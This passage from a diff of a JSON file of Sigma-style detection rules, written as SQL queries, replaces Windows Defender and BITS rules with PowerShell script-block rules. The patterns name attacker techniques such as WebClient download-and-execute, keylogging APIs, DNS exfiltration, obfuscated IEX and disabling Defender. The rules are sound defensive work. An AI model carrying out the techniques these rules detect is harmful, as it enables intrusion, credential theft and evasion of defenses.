"c2993223-6da8-4b1a-88ee-668b8bf315e9", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_user_discovery_get_aduser.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "status": "experimental", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Suspicious PowerShell Download - Powershell Script", + "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_susp_download.yml" }, { - "title": "Scheduled Task Executed From A Suspicious Location", - "id": "424273ea-7cf8-43a6-b712-375f925e481f", + "title": "Powershell Keylogging", + "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.collection", + "attack.t1056.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_execution_from_susp_locations.yml" + "filename": "posh_ps_keylogging.yml" }, { - "title": "Scheduled Task Executed Uncommon LOLBIN", - "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "title": "Add New Windows Capability - ScriptBlock", + "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.execution" ], "falsepositives": [ - "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" + "filename": "posh_ps_add_windows_capability.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Deleted Mounted Share", + "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "status": "test", + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1070.005" ], "falsepositives": [ - "Other legitimate domains used by software updaters" + "Administrators or Power users may remove their shares via cmd line" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT ((RemoteName LIKE '%.com%' ESCAPE '\\' OR RemoteName LIKE '%.azureedge.net%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" ], - "filename": "win_bits_client_uncommon_domain.yml" + "filename": "posh_ps_susp_mounted_share_deletion.yml" }, { - "title": "Suspicious Download File Extension with BITS", - "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "frack113", + "title": "Suspicious PowerShell WindowStyle Option", + "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "status": "test", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "author": "frack113, Tim Shelton (fp AWS)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1564.003" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT (LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_file.yml" + "filename": "posh_ps_susp_windowstyle.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "title": "PowerShell Hotfix Enumeration", + "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.discovery" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate administration scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_hotfix_enum.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Powershell Detect Virtualization Environment", + "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "status": "test", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "author": "frack113, Duc.Le-GTSC", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1497.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_detect_vm_env.yml" }, { - "title": "Suspicious Digital Signature Of AppX Package", - "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "title": "Root Certificate Installed - PowerShell", + "id": "42821614-9264-4761-acfc-5772c3286f76", "status": "experimental", - "description": "Detects execution of AppX packages with known suspicious or malicious signature", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" ], - "filename": "win_appxpackaging_om_sups_appx_signature.yml" + "filename": "posh_ps_root_certificate_installed.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Change PowerShell Policies to an Insecure Level - PowerShell", + "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "status": "experimental", + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Administrator script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH 